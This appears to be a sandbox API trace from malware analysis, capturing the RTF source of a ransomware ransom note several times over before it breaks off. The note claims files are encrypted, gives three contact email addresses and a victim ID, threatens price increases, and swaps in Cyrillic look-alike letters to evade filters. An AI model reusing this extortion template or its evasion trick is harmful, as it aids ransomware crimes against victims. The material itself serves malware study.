Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.545] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2863a28, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 